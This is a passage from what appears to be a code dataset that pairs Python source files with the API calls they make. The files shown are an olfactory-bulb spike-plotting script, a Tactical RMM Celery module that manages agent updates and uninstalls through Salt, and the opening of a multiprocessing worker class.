Vector2\n'), ((2593, 2606), 'pygame.math.Vector2', 'Vector2', (['(1)', '(0)'], {}), '(1, 0)\n', (2600, 2606), False, 'from pygame.math import Vector2\n'), ((2983, 2996), 'pygame.math.Vector2', 'Vector2', (['(1)', '(0)'], {}), '(1, 0)\n', (2990, 2996), False, 'from pygame.math import Vector2\n'), ((2665, 2679), 'pygame.math.Vector2', 'Vector2', (['(0)', '(-1)'], {}), '(0, -1)\n', (2672, 2679), False, 'from pygame.math import Vector2\n'), ((3055, 3069), 'pygame.math.Vector2', 'Vector2', (['(0)', '(-1)'], {}), '(0, -1)\n', (3062, 3069), False, 'from pygame.math import Vector2\n'), ((2735, 2748), 'pygame.math.Vector2', 'Vector2', (['(0)', '(1)'], {}), '(0, 1)\n', (2742, 2748), False, 'from pygame.math import Vector2\n'), ((3125, 3138), 'pygame.math.Vector2', 'Vector2', (['(0)', '(1)'], {}), '(0, 1)\n', (3132, 3138), False, 'from pygame.math import Vector2\n')] |
# -*- coding: utf-8 -*-
"""
Created on Sun Mar 6 18:22:04 2011
@author: -
"""
import os
import numpy
from matplotlib import pyplot
from neuronpy.graphics import spikeplot
from bulbspikes import *
from neuronpy.util import spiketrain
from params import sim_var
homedir = os.path.join(os.path.relpath('..'))
analysis_path = homedir
def format_axes(ax, dt=1, ylim=(0.,4.)):
#ax.set_xticks(numpy.arange(0,num_intervals,(num_intervals-1)/4.))
#ax.set_xticklabels(['$-\pi$','$-\pi/2$','$0$','$\pi/2$','$\pi$'], fontsize=18)
xlim = ax.get_xlim()
timesteps=int((xlim[1]*dt-xlim[0]*dt)/2.)
ax.set_xticks(numpy.linspace(xlim[0],xlim[1],5))
ax.set_xticklabels(numpy.asarray(numpy.linspace(-timesteps,timesteps,5), dtype=int))
ax.set_xlabel('lag (ms)')
ax.set_ylim(ylim)
ax.set_ylabel('Synchronization magnitude')
def draw_cell(cellid, ax, color='black'):
xloc = 10+cellid*20
# Lateral dends
y = numpy.abs(numpy.subtract(range(101), xloc))
yvec = numpy.log(numpy.add(y,1))
ax.plot(range(101), yvec, color=color)
# Soma
ax.fill_between(range(101), numpy.ones(101), yvec, \
where=numpy.ma.masked_where(yvec < 1., yvec).mask, \
color=color, linewidth=0.)
# Glom
ax.plot([xloc], [9], color=color, marker='o', markersize=10, markerfacecolor='white', markeredgecolor=color)
ax.plot([xloc], [9], color=color, marker='o', markersize=9, alpha=0.25)
ax.plot([xloc], [9], color=color, marker='1', markersize=7, markeredgewidth=2)
# Primary dendrite
ax.plot([xloc, xloc], [0,8], color=color, linewidth=2)
format_schematic_axis(ax)
def draw_weights(cellids, ax, color='black',scale=1.):
"""Draw granule cells"""
import synweightsnapshot
sws = synweightsnapshot.SynWeightSnapshot( \
nummit=sim_var['num_mitral'], \
numgran=sim_var['num_granule'])
raw=sws.read_file(sim_var['wt_input_file'],
os.path.join(homedir, sim_var['weight_dir']))
sws.parse_data(raw)
for cellid in cellids:
wts = sws.m2g[cellid,:,0]
wts = wts/numpy.max(wts)
for i in range(len(wts)):
if wts[i] > 0.0001:
cellloc = 10+cellid*20
y = numpy.abs(i - cellloc)
yloc = numpy.log(numpy.add(y,1))
gloc = -3.5+((i%2)*1.5)
ax.plot([i],[yloc], marker='o', markerfacecolor=color, markersize=4.*scale, markeredgecolor=color)
ax.plot([i,i],[yloc, gloc], color=color)
ax.plot([i],[gloc], marker='^', markerfacecolor=color, markersize=6.*scale, markeredgecolor=color)
format_schematic_axis(ax)
def format_schematic_axis(ax):
ax.set_xlim((0,100))
xticks = [10,30,50,70,90]
ax.set_xticks(xticks)
ax.set_xticklabels(numpy.multiply(xticks,10))
ax.set_xlabel('distance in microns')
ax.set_ylim((-5,11))
ax.spines['left'].set_color('none')
ax.spines['right'].set_color('none')
ax.set_yticks([])
ax.spines['top'].set_color('none')
ax.spines['bottom'].set_color('black')
ax.xaxis.set_ticks_position('bottom')
def read_weightevents():
M = numpy.loadtxt(os.path.join(analysis_path, 'stimweightevents.txt'))
data = []
for i in range(5):
data.append([])
for m in M:
data[int(m[0])].append(m[1])
return data
def read_delayevents():
M = numpy.loadtxt(os.path.join(analysis_path, 'stimdelayevents.txt'))
data = []
for i in range(5):
data.append([])
for m in M:
data[int(m[0])].append(m[1])
return data
def raster(pair=[0,4], cluster_width=5, fi=.005, xlim=(1000,2000)):
# pos1 = (10+pair[0]*20, cluster_width, 1, pair)
# pos2 = (10+pair[1]*20, cluster_width, 1, pair)
# stim_odor_mags = numpy.ones(5)*.55
fig = pyplot.figure(figsize=(9.5,5.7))
raster_ax = fig.add_axes([.1,.1,.8,.27])
schematic_ax = fig.add_axes([.1,.85,.8,.1])
syn_ax = fig.add_axes([.1,.45,.8,.225])
draw_cell(pair[0], schematic_ax, color='red')
draw_cell(pair[1], schematic_ax, color='blue')
draw_weights(pair, schematic_ax, color='black')
# Analyze an output file in some_dir
bulb_spikes = BulbSpikes(sim_time=sim_var['tstop'])
bulb_spikes.read_file(os.path.join(homedir,'spikeout.spk'))
breath_events = numpy.loadtxt(os.path.join(homedir, 'breathevents.txt'))
wts = read_weightevents()
delays = read_delayevents()
dt = 1
tstop = xlim[1]
x = numpy.arange(0,tstop,dt)
y0 = numpy.zeros(tstop/dt)
y1 = numpy.zeros(tstop/dt)
EXP = numpy.exp(numpy.multiply(x,-1./200.))-numpy.exp( \
numpy.multiply(x,-1./20.))
idx = 0
for b in breath_events:
if b >= tstop:
break
else:
dtidx = int((b+delays[pair[0]][idx])/dt)
y0[dtidx:] += EXP[:-dtidx]*wts[pair[0]][idx]
dtidx = int((b+delays[pair[1]][idx])/dt)
y1[dtidx:] += EXP[:-dtidx]*wts[pair[1]][idx]
idx += 1
redplt = syn_ax.plot(x,y0, color='red')
blueplt = syn_ax.plot(x,y1, color='blue')
for breath in breath_events:
breathplt = syn_ax.plot([breath, breath], [0,2], linestyle='--', \
color='gray', linewidth=2)
syn_ax.set_xlim(xlim)
syn_ax.set_ylim(0,1.6)
syn_ax.set_yticks([])
syn_ax.set_xticks([])
syn_ax.set_ylabel('EPSC onto tuft')
leg = syn_ax.legend([breathplt, redplt, blueplt], \
['sniff event', 'input onto red', 'input onto blue'], \
bbox_to_anchor=(0, 1.15, 1., .102), loc=1, ncol=3, mode="expand", \
borderaxespad=0., handletextpad=.2)
# Mark sniff interval
for i in range(len(breath_events)):
if breath_events[i] > xlim[0]:
span = syn_ax.annotate('', xy=(breath_events[i], .28), xycoords='data',
xytext=(breath_events[i+1], .28), \
textcoords='data', \
arrowprops=dict(arrowstyle="|-|", linewidth=2)
)
syn_ax.text((breath_events[i]+breath_events[i+1])/2., .53, \
'sniff every\n150 - 250 ms', \
horizontalalignment='center', verticalalignment='top', \
backgroundcolor='white')
break
# Mark amplitude interval
span = syn_ax.annotate('', xy=(1190, 1.28), xycoords='data',
xytext=(1190, 1.12), \
textcoords='data', \
arrowprops=dict(arrowstyle="|-|", linewidth=2)
)
syn_ax.text(1215, 1.21, \
'+/- 5%', \
horizontalalignment='left', verticalalignment='center')
# Mark delay interval
for i in range(len(breath_events)):
if breath_events[i] > 1400:
span = syn_ax.annotate('', xy=(breath_events[i]-2, .5), xycoords='data',
xytext=(breath_events[i]+17, .5), \
textcoords='data', \
arrowprops=dict(arrowstyle="|-|", linewidth=2)
)
syn_ax.text(breath_events[i]+7.5, .28, \
'delay 0-15 ms', \
horizontalalignment='center', verticalalignment='top', \
backgroundcolor='white')
break
spikes = bulb_spikes.get_mitral_spikes()
ref=spikes[pair[0]]
comp=spikes[pair[1]]
gcspikes = bulb_spikes.get_granule_spikes()
mididx = 10+pair[0]*20
gcleft = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]
mididx = 10+pair[1]*20
gcright = gcspikes[mididx-int(cluster_width/2.):mididx+int(cluster_width/2.)+1]
sp = spikeplot.SpikePlot(fig=fig, savefig=False)
sp.set_markercolor('blue')
sp.set_markeredgewidth(2.)
sp.set_markerscale(4)
sp.plot_spikes([comp], label='comp', cell_offset=cluster_width*2+5, \
draw=False )
sp.set_markercolor('red')
sp.plot_spikes([ref], label='ref', cell_offset=cluster_width*2+2, \
draw=False)
sp.set_markerscale(1.3)
sp.set_markeredgewidth(1.5)
sp.set_markercolor('blue')
sp.plot_spikes(gcright, label='gcright', cell_offset=cluster_width, \
draw=False)
sp.set_markercolor('red')
sp.plot_spikes(gcleft, label='gcleft', cell_offset=0, \
draw=False)
coincidences, mask_a, mask_b, ratio = \
spiketrain.get_sync_traits(ref, comp, window=5)
# idx = 0
# for i in mask_a:
# if i == 1:
# raster_ax.plot([ref[idx]],[cluster_width*2+1.9], marker='o', color='red')
# idx += 1
idx = 0
for i in mask_b:
if i == 1:
if comp[idx] >= xlim[0] and comp[idx] < xlim[1]:
raster_ax.text(comp[idx],cluster_width*2+8.5, '*', \
color='purple', fontweight='bold', \
horizontalalignment='center', verticalalignment='center')
#raster_ax.plot([comp[idx]],[cluster_width*2+7], marker='o', color='blue')
idx += 1
raster_ax.text(2000,cluster_width*2+8.5, '(synchronized)', color='purple', \
horizontalalignment='center', verticalalignment='center',
fontsize=11)
raster_ax.set_yticks([])
ylim = (0.5, cluster_width*2+7.5)
for breath in breath_events:
raster_ax.plot([breath, breath], [ylim[0], ylim[1]], linestyle='--', color='gray', linewidth=2)
sp.update_xlim(xlim)
raster_ax.set_ylim(ylim)
raster_ax.set_xlabel('time (ms)')
raster_ax.set_ylabel('spike output\n granule mitral\n\n', horizontalalignment='center')
pos = schematic_ax.get_position()
schematic_ax.text(.025, pos.ymax+.02, 'A)', transform=fig.transFigure,
verticalalignment='baseline')
pos = syn_ax.get_position()
syn_ax.text(.025, pos.ymax+.07, 'B)', transform=fig.transFigure,
verticalalignment='baseline')
pos = raster_ax.get_position()
raster_ax.text(.025, pos.ymax+.02, 'C)', transform=fig.transFigure,
verticalalignment='baseline')
# fig.savefig(os.path.join(analysis_path, 'raster_w%d_(%d-%d)_%.3f.pdf') %(cluster_width, pair[0], pair[1], fi))
fig.savefig(os.path.join(analysis_path, 'fig1.pdf'))
raster()
| [
"numpy.multiply",
"numpy.abs",
"numpy.ma.masked_where",
"synweightsnapshot.SynWeightSnapshot",
"neuronpy.graphics.spikeplot.SpikePlot",
"numpy.zeros",
"numpy.ones",
"matplotlib.pyplot.figure",
"numpy.max",
"numpy.arange",
"os.path.relpath",
"numpy.linspace",
"numpy.add",
"os.path.join",
"neuronpy.util.spiketrain.get_sync_traits"
] | [((286, 307), 'os.path.relpath', 'os.path.relpath', (['""".."""'], {}), "('..')\n", (301, 307), False, 'import os\n'), ((1748, 1850), 'synweightsnapshot.SynWeightSnapshot', 'synweightsnapshot.SynWeightSnapshot', ([], {'nummit': "sim_var['num_mitral']", 'numgran': "sim_var['num_granule']"}), "(nummit=sim_var['num_mitral'], numgran=\n sim_var['num_granule'])\n", (1783, 1850), False, 'import synweightsnapshot\n'), ((3810, 3843), 'matplotlib.pyplot.figure', 'pyplot.figure', ([], {'figsize': '(9.5, 5.7)'}), '(figsize=(9.5, 5.7))\n', (3823, 3843), False, 'from matplotlib import pyplot\n'), ((4480, 4506), 'numpy.arange', 'numpy.arange', (['(0)', 'tstop', 'dt'], {}), '(0, tstop, dt)\n', (4492, 4506), False, 'import numpy\n'), ((4514, 4537), 'numpy.zeros', 'numpy.zeros', (['(tstop / dt)'], {}), '(tstop / dt)\n', (4525, 4537), False, 'import numpy\n'), ((4545, 4568), 'numpy.zeros', 'numpy.zeros', (['(tstop / dt)'], {}), '(tstop / dt)\n', (4556, 4568), False, 'import numpy\n'), ((7775, 7818), 'neuronpy.graphics.spikeplot.SpikePlot', 'spikeplot.SpikePlot', ([], {'fig': 'fig', 'savefig': '(False)'}), '(fig=fig, savefig=False)\n', (7794, 7818), False, 'from neuronpy.graphics import spikeplot\n'), ((8493, 8540), 'neuronpy.util.spiketrain.get_sync_traits', 'spiketrain.get_sync_traits', (['ref', 'comp'], {'window': '(5)'}), '(ref, comp, window=5)\n', (8519, 8540), False, 'from neuronpy.util import spiketrain\n'), ((619, 654), 'numpy.linspace', 'numpy.linspace', (['xlim[0]', 'xlim[1]', '(5)'], {}), '(xlim[0], xlim[1], 5)\n', (633, 654), False, 'import numpy\n'), ((1002, 1017), 'numpy.add', 'numpy.add', (['y', '(1)'], {}), '(y, 1)\n', (1011, 1017), False, 'import numpy\n'), ((1104, 1119), 'numpy.ones', 'numpy.ones', (['(101)'], {}), '(101)\n', (1114, 1119), False, 'import numpy\n'), ((1941, 1985), 'os.path.join', 'os.path.join', (['homedir', "sim_var['weight_dir']"], {}), "(homedir, sim_var['weight_dir'])\n", (1953, 1985), False, 'import os\n'), ((2804, 2830), 'numpy.multiply', 'numpy.multiply', (['xticks', '(10)'], {}), '(xticks, 10)\n', (2818, 2830), False, 'import numpy\n'), ((3173, 3224), 'os.path.join', 'os.path.join', (['analysis_path', '"""stimweightevents.txt"""'], {}), "(analysis_path, 'stimweightevents.txt')\n", (3185, 3224), False, 'import os\n'), ((3403, 3453), 'os.path.join', 'os.path.join', (['analysis_path', '"""stimdelayevents.txt"""'], {}), "(analysis_path, 'stimdelayevents.txt')\n", (3415, 3453), False, 'import os\n'), ((4258, 4295), 'os.path.join', 'os.path.join', (['homedir', '"""spikeout.spk"""'], {}), "(homedir, 'spikeout.spk')\n", (4270, 4295), False, 'import os\n'), ((4330, 4371), 'os.path.join', 'os.path.join', (['homedir', '"""breathevents.txt"""'], {}), "(homedir, 'breathevents.txt')\n", (4342, 4371), False, 'import os\n'), ((10317, 10356), 'os.path.join', 'os.path.join', (['analysis_path', '"""fig1.pdf"""'], {}), "(analysis_path, 'fig1.pdf')\n", (10329, 10356), False, 'import os\n'), ((691, 731), 'numpy.linspace', 'numpy.linspace', (['(-timesteps)', 'timesteps', '(5)'], {}), '(-timesteps, timesteps, 5)\n', (705, 731), False, 'import numpy\n'), ((2090, 2104), 'numpy.max', 'numpy.max', (['wts'], {}), '(wts)\n', (2099, 2104), False, 'import numpy\n'), ((4587, 4618), 'numpy.multiply', 'numpy.multiply', (['x', '(-1.0 / 200.0)'], {}), '(x, -1.0 / 200.0)\n', (4601, 4618), False, 'import numpy\n'), ((4640, 4670), 'numpy.multiply', 'numpy.multiply', (['x', '(-1.0 / 20.0)'], {}), '(x, -1.0 / 20.0)\n', (4654, 4670), False, 'import numpy\n'), ((1143, 1182), 'numpy.ma.masked_where', 'numpy.ma.masked_where', (['(yvec < 1.0)', 'yvec'], {}), '(yvec < 1.0, yvec)\n', (1164, 1182), False, 'import numpy\n'), ((2235, 2257), 'numpy.abs', 'numpy.abs', (['(i - cellloc)'], {}), '(i - cellloc)\n', (2244, 2257), False, 'import numpy\n'), ((2291, 2306), 'numpy.add', 'numpy.add', (['y', '(1)'], {}), '(y, 1)\n', (2300, 2306), False, 'import numpy\n')] |
import os
import subprocess
from loguru import logger
from time import sleep
import random
import requests
from packaging import version as pyver
from django.conf import settings
from tacticalrmm.celery import app
from agents.models import Agent, AgentOutage
from core.models import CoreSettings
logger.configure(**settings.LOG_CONFIG)
@app.task
def send_agent_update_task(pks, version):
assert isinstance(pks, list)
q = Agent.objects.filter(pk__in=pks)
agents = [i.pk for i in q if pyver.parse(i.version) < pyver.parse(version)]
chunks = (agents[i : i + 30] for i in range(0, len(agents), 30))
for chunk in chunks:
for pk in chunk:
agent = Agent.objects.get(pk=pk)
if agent.operating_system is not None:
if "64bit" in agent.operating_system:
arch = "64"
elif "32bit" in agent.operating_system:
arch = "32"
else:
arch = "64"
url = settings.DL_64 if arch == "64" else settings.DL_32
inno = (
f"winagent-v{version}.exe"
if arch == "64"
else f"winagent-v{version}-x86.exe"
)
r = agent.salt_api_async(
func="win_agent.do_agent_update_v2",
kwargs={
"inno": inno,
"url": url,
},
)
sleep(10)
@app.task
def auto_self_agent_update_task():
core = CoreSettings.objects.first()
if not core.agent_auto_update:
return
q = Agent.objects.all()
agents = [
i.pk
for i in q
if pyver.parse(i.version) < pyver.parse(settings.LATEST_AGENT_VER)
]
chunks = (agents[i : i + 30] for i in range(0, len(agents), 30))
for chunk in chunks:
for pk in chunk:
agent = Agent.objects.get(pk=pk)
if agent.operating_system is not None:
if "64bit" in agent.operating_system:
arch = "64"
elif "32bit" in agent.operating_system:
arch = "32"
else:
arch = "64"
url = settings.DL_64 if arch == "64" else settings.DL_32
inno = (
f"winagent-v{settings.LATEST_AGENT_VER}.exe"
if arch == "64"
else f"winagent-v{settings.LATEST_AGENT_VER}-x86.exe"
)
r = agent.salt_api_async(
func="win_agent.do_agent_update_v2",
kwargs={
"inno": inno,
"url": url,
},
)
sleep(10)
@app.task
def update_salt_minion_task():
q = Agent.objects.all()
agents = [
i.pk
for i in q
if pyver.parse(i.version) >= pyver.parse("0.11.0")
and pyver.parse(i.salt_ver) < pyver.parse(settings.LATEST_SALT_VER)
]
chunks = (agents[i : i + 50] for i in range(0, len(agents), 50))
for chunk in chunks:
for pk in chunk:
agent = Agent.objects.get(pk=pk)
r = agent.salt_api_async(func="win_agent.update_salt")
sleep(20)
@app.task
def get_wmi_detail_task(pk):
agent = Agent.objects.get(pk=pk)
r = agent.salt_api_cmd(timeout=30, func="win_agent.system_info")
if r == "timeout" or r == "error":
return "failed"
agent.wmi_detail = r
agent.save(update_fields=["wmi_detail"])
return "ok"
@app.task
def sync_salt_modules_task(pk):
agent = Agent.objects.get(pk=pk)
r = agent.salt_api_cmd(timeout=35, func="saltutil.sync_modules")
# successful sync if new/charnged files: {'return': [{'MINION-15': ['modules.get_eventlog', 'modules.win_agent', 'etc...']}]}
# successful sync with no new/changed files: {'return': [{'MINION-15': []}]}
if r == "timeout" or r == "error":
logger.error(f"Unable to sync modules {agent.salt_id}")
return
logger.info(f"Successfully synced salt modules on {agent.hostname}")
return "ok"
@app.task
def batch_sync_modules_task():
# sync modules, split into chunks of 50 agents to not overload salt
agents = Agent.objects.all()
online = [i.salt_id for i in agents if i.status == "online"]
chunks = (online[i : i + 50] for i in range(0, len(online), 50))
for chunk in chunks:
Agent.salt_batch_async(minions=chunk, func="saltutil.sync_modules")
sleep(10)
@app.task
def batch_sysinfo_task():
# update system info using WMI
agents = Agent.objects.all()
online = [
i.salt_id
for i in agents
if not i.not_supported("0.11.0") and i.status == "online"
]
chunks = (online[i : i + 30] for i in range(0, len(online), 30))
for chunk in chunks:
Agent.salt_batch_async(minions=chunk, func="win_agent.local_sys_info")
sleep(10)
@app.task
def uninstall_agent_task(salt_id):
attempts = 0
error = False
while 1:
try:
r = requests.post(
f"http://{settings.SALT_HOST}:8123/run",
json=[
{
"client": "local",
"tgt": salt_id,
"fun": "win_agent.uninstall_agent",
"timeout": 8,
"username": settings.SALT_USERNAME,
"password": settings.SALT_PASSWORD,
"eauth": "<PASSWORD>",
}
],
timeout=10,
)
ret = r.json()["return"][0][salt_id]
except Exception:
attempts += 1
else:
if ret != "ok":
attempts += 1
else:
attempts = 0
if attempts >= 10:
error = True
break
elif attempts == 0:
break
if error:
logger.error(f"{salt_id} uninstall failed")
else:
logger.info(f"{salt_id} was successfully uninstalled")
try:
r = requests.post(
f"http://{settings.SALT_HOST}:8123/run",
json=[
{
"client": "wheel",
"fun": "key.delete",
"match": salt_id,
"username": settings.SALT_USERNAME,
"password": settings.SALT_PASSWORD,
"eauth": "<PASSWORD>",
}
],
timeout=30,
)
except Exception:
logger.error(f"{salt_id} unable to remove salt-key")
return "ok"
@app.task
def agent_outage_email_task(pk):
sleep(random.randint(1, 15))
outage = AgentOutage.objects.get(pk=pk)
outage.send_outage_email()
outage.outage_email_sent = True
outage.save(update_fields=["outage_email_sent"])
@app.task
def agent_recovery_email_task(pk):
sleep(random.randint(1, 15))
outage = AgentOutage.objects.get(pk=pk)
outage.send_recovery_email()
outage.recovery_email_sent = True
outage.save(update_fields=["recovery_email_sent"])
@app.task
def agent_outages_task():
agents = Agent.objects.only("pk")
for agent in agents:
if agent.status == "overdue":
outages = AgentOutage.objects.filter(agent=agent)
if outages and outages.last().is_active:
continue
outage = AgentOutage(agent=agent)
outage.save()
if agent.overdue_email_alert:
agent_outage_email_task.delay(pk=outage.pk)
if agent.overdue_text_alert:
# TODO
pass
| [
"random.randint",
"loguru.logger.error",
"loguru.logger.configure",
"agents.models.AgentOutage.objects.get",
"agents.models.Agent.objects.only",
"agents.models.AgentOutage",
"agents.models.Agent.objects.filter",
"packaging.version.parse",
"time.sleep",
"agents.models.Agent.salt_batch_async",
"loguru.logger.info",
"agents.models.AgentOutage.objects.filter",
"agents.models.Agent.objects.all",
"requests.post",
"core.models.CoreSettings.objects.first",
"agents.models.Agent.objects.get"
] | [((301, 340), 'loguru.logger.configure', 'logger.configure', ([], {}), '(**settings.LOG_CONFIG)\n', (317, 340), False, 'from loguru import logger\n'), ((437, 469), 'agents.models.Agent.objects.filter', 'Agent.objects.filter', ([], {'pk__in': 'pks'}), '(pk__in=pks)\n', (457, 469), False, 'from agents.models import Agent, AgentOutage\n'), ((1571, 1599), 'core.models.CoreSettings.objects.first', 'CoreSettings.objects.first', ([], {}), '()\n', (1597, 1599), False, 'from core.models import CoreSettings\n'), ((1659, 1678), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (1676, 1678), False, 'from agents.models import Agent, AgentOutage\n'), ((2857, 2876), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (2874, 2876), False, 'from agents.models import Agent, AgentOutage\n'), ((3369, 3393), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (3386, 3393), False, 'from agents.models import Agent, AgentOutage\n'), ((3669, 3693), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (3686, 3693), False, 'from agents.models import Agent, AgentOutage\n'), ((4097, 4165), 'loguru.logger.info', 'logger.info', (['f"""Successfully synced salt modules on {agent.hostname}"""'], {}), "(f'Successfully synced salt modules on {agent.hostname}')\n", (4108, 4165), False, 'from loguru import logger\n'), ((4310, 4329), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (4327, 4329), False, 'from agents.models import Agent, AgentOutage\n'), ((4669, 4688), 'agents.models.Agent.objects.all', 'Agent.objects.all', ([], {}), '()\n', (4686, 4688), False, 'from agents.models import Agent, AgentOutage\n'), ((6818, 6848), 'agents.models.AgentOutage.objects.get', 'AgentOutage.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (6841, 6848), False, 'from agents.models import Agent, AgentOutage\n'), ((7062, 7092), 'agents.models.AgentOutage.objects.get', 'AgentOutage.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (7085, 7092), False, 'from agents.models import Agent, AgentOutage\n'), ((7270, 7294), 'agents.models.Agent.objects.only', 'Agent.objects.only', (['"""pk"""'], {}), "('pk')\n", (7288, 7294), False, 'from agents.models import Agent, AgentOutage\n'), ((1503, 1512), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (1508, 1512), False, 'from time import sleep\n'), ((2796, 2805), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (2801, 2805), False, 'from time import sleep\n'), ((3306, 3315), 'time.sleep', 'sleep', (['(20)'], {}), '(20)\n', (3311, 3315), False, 'from time import sleep\n'), ((4021, 4076), 'loguru.logger.error', 'logger.error', (['f"""Unable to sync modules {agent.salt_id}"""'], {}), "(f'Unable to sync modules {agent.salt_id}')\n", (4033, 4076), False, 'from loguru import logger\n'), ((4497, 4564), 'agents.models.Agent.salt_batch_async', 'Agent.salt_batch_async', ([], {'minions': 'chunk', 'func': '"""saltutil.sync_modules"""'}), "(minions=chunk, func='saltutil.sync_modules')\n", (4519, 4564), False, 'from agents.models import Agent, AgentOutage\n'), ((4573, 4582), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (4578, 4582), False, 'from time import sleep\n'), ((4920, 4990), 'agents.models.Agent.salt_batch_async', 'Agent.salt_batch_async', ([], {'minions': 'chunk', 'func': '"""win_agent.local_sys_info"""'}), "(minions=chunk, func='win_agent.local_sys_info')\n", (4942, 4990), False, 'from agents.models import Agent, AgentOutage\n'), ((4999, 5008), 'time.sleep', 'sleep', (['(10)'], {}), '(10)\n', (5004, 5008), False, 'from time import sleep\n'), ((6043, 6086), 'loguru.logger.error', 'logger.error', (['f"""{salt_id} uninstall failed"""'], {}), "(f'{salt_id} uninstall failed')\n", (6055, 6086), False, 'from loguru import logger\n'), ((6105, 6159), 'loguru.logger.info', 'logger.info', (['f"""{salt_id} was successfully uninstalled"""'], {}), "(f'{salt_id} was successfully uninstalled')\n", (6116, 6159), False, 'from loguru import logger\n'), ((6182, 6423), 'requests.post', 'requests.post', (['f"""http://{settings.SALT_HOST}:8123/run"""'], {'json': "[{'client': 'wheel', 'fun': 'key.delete', 'match': salt_id, 'username':\n settings.SALT_USERNAME, 'password': settings.SALT_PASSWORD, 'eauth':\n '<PASSWORD>'}]", 'timeout': '(30)'}), "(f'http://{settings.SALT_HOST}:8123/run', json=[{'client':\n 'wheel', 'fun': 'key.delete', 'match': salt_id, 'username': settings.\n SALT_USERNAME, 'password': settings.SALT_PASSWORD, 'eauth':\n '<PASSWORD>'}], timeout=30)\n", (6195, 6423), False, 'import requests\n'), ((6782, 6803), 'random.randint', 'random.randint', (['(1)', '(15)'], {}), '(1, 15)\n', (6796, 6803), False, 'import random\n'), ((7026, 7047), 'random.randint', 'random.randint', (['(1)', '(15)'], {}), '(1, 15)\n', (7040, 7047), False, 'import random\n'), ((691, 715), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (708, 715), False, 'from agents.models import Agent, AgentOutage\n'), ((1948, 1972), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (1965, 1972), False, 'from agents.models import Agent, AgentOutage\n'), ((3206, 3230), 'agents.models.Agent.objects.get', 'Agent.objects.get', ([], {'pk': 'pk'}), '(pk=pk)\n', (3223, 3230), False, 'from agents.models import Agent, AgentOutage\n'), ((5135, 5403), 'requests.post', 'requests.post', (['f"""http://{settings.SALT_HOST}:8123/run"""'], {'json': "[{'client': 'local', 'tgt': salt_id, 'fun': 'win_agent.uninstall_agent',\n 'timeout': 8, 'username': settings.SALT_USERNAME, 'password': settings.\n SALT_PASSWORD, 'eauth': '<PASSWORD>'}]", 'timeout': '(10)'}), "(f'http://{settings.SALT_HOST}:8123/run', json=[{'client':\n 'local', 'tgt': salt_id, 'fun': 'win_agent.uninstall_agent', 'timeout':\n 8, 'username': settings.SALT_USERNAME, 'password': settings.\n SALT_PASSWORD, 'eauth': '<PASSWORD>'}], timeout=10)\n", (5148, 5403), False, 'import requests\n'), ((6657, 6709), 'loguru.logger.error', 'logger.error', (['f"""{salt_id} unable to remove salt-key"""'], {}), "(f'{salt_id} unable to remove salt-key')\n", (6669, 6709), False, 'from loguru import logger\n'), ((7381, 7420), 'agents.models.AgentOutage.objects.filter', 'AgentOutage.objects.filter', ([], {'agent': 'agent'}), '(agent=agent)\n', (7407, 7420), False, 'from agents.models import Agent, AgentOutage\n'), ((7521, 7545), 'agents.models.AgentOutage', 'AgentOutage', ([], {'agent': 'agent'}), '(agent=agent)\n', (7532, 7545), False, 'from agents.models import Agent, AgentOutage\n'), ((503, 525), 'packaging.version.parse', 'pyver.parse', (['i.version'], {}), '(i.version)\n', (514, 525), True, 'from packaging import version as pyver\n'), ((528, 548), 'packaging.version.parse', 'pyver.parse', (['version'], {}), '(version)\n', (539, 548), True, 'from packaging import version as pyver\n'), ((1737, 1759), 'packaging.version.parse', 'pyver.parse', (['i.version'], {}), '(i.version)\n', (1748, 1759), True, 'from packaging import version as pyver\n'), ((1762, 1800), 'packaging.version.parse', 'pyver.parse', (['settings.LATEST_AGENT_VER'], {}), '(settings.LATEST_AGENT_VER)\n', (1773, 1800), True, 'from packaging import version as pyver\n'), ((2935, 2957), 'packaging.version.parse', 'pyver.parse', (['i.version'], {}), '(i.version)\n', (2946, 2957), True, 'from packaging import version as pyver\n'), ((2961, 2982), 'packaging.version.parse', 'pyver.parse', (['"""0.11.0"""'], {}), "('0.11.0')\n", (2972, 2982), True, 'from packaging import version as pyver\n'), ((2995, 3018), 'packaging.version.parse', 'pyver.parse', (['i.salt_ver'], {}), '(i.salt_ver)\n', (3006, 3018), True, 'from packaging import version as pyver\n'), ((3021, 3058), 'packaging.version.parse', 'pyver.parse', (['settings.LATEST_SALT_VER'], {}), '(settings.LATEST_SALT_VER)\n', (3032, 3058), True, 'from packaging import version as pyver\n')] |
import collections
import dataclasses
import gc
import multiprocessing
import os
from multiprocessing import Lock, Pipe, Pool, Process, Value
from typing import Any, Callable, Dict, Iterable, List, NewType, Tuple, Union
from .exceptions import (UserFuncRaisedException, WorkerDiedError,
WorkerIsAliveError, WorkerIsDeadError,
WorkerResourceReceivedUnidentifiedMessage)
from .messaging import (BaseMessage, DataPayload, SigClose, StatusRequest,
UserFunc, UserFuncException, WorkerError, WorkerStatus)
from .workerprocess import WorkerProcess
class WorkerResource:
'''Manages a worker process and pipe to it.'''
__slots__ = ['pipe', 'proc', 'verbose']
def __init__(self, target: Callable = None, start: bool = False, args=None, kwargs=None, logging: bool = True, verbose: bool = False, method: str = 'forkserver'):
'''Open Process and pipe to it.
'''
self.verbose = verbose
# set up userfunc
if target is not None:
args = args if args is not None else tuple()
kwargs = kwargs if kwargs is not None else dict()
userfunc = UserFunc(target, *args, **kwargs)
else:
userfunc = None
ctx = multiprocessing.get_context(method)
self.pipe, worker_pipe = Pipe(duplex=True)
self.proc = ctx.Process(
target=WorkerProcess(worker_pipe, userfunc=userfunc, verbose=verbose, logging=logging),
)
# start worker if requested
if start:
self.start()
